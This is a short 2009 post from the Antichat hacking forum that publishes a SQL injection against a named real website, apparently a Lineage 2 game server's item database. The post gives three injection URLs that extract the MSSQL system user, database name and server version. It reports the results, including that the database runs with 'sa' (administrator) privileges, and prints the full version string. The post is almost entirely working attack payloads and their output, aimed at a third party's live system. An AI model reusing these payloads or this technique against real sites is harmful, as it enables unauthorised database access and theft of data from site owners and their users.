15.04.2009, 21:09
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
MsSQL injection
Код:
http://la2.is74.ru/c6_info/?part=items&id=1'+or+1=(select+system_user)--
Код:
http://la2.is74.ru/c6_info/?part=items&id=1'+or+1=(select+db_name())--
Код:
http://la2.is74.ru/c6_info/?part=items&id=1'+or+1=(select+@@version)--
user: sa - кто когда-либо проводил мсскл инъекции, знает, что sa в мсскле типа root'a в мускуле.
db_name: C6_INFO
version: Microsoft SQL Server 2005 - 9.00.3042.00 (X64) Feb 10 2007 00:59:02 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Evaluation Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1)
|
|
|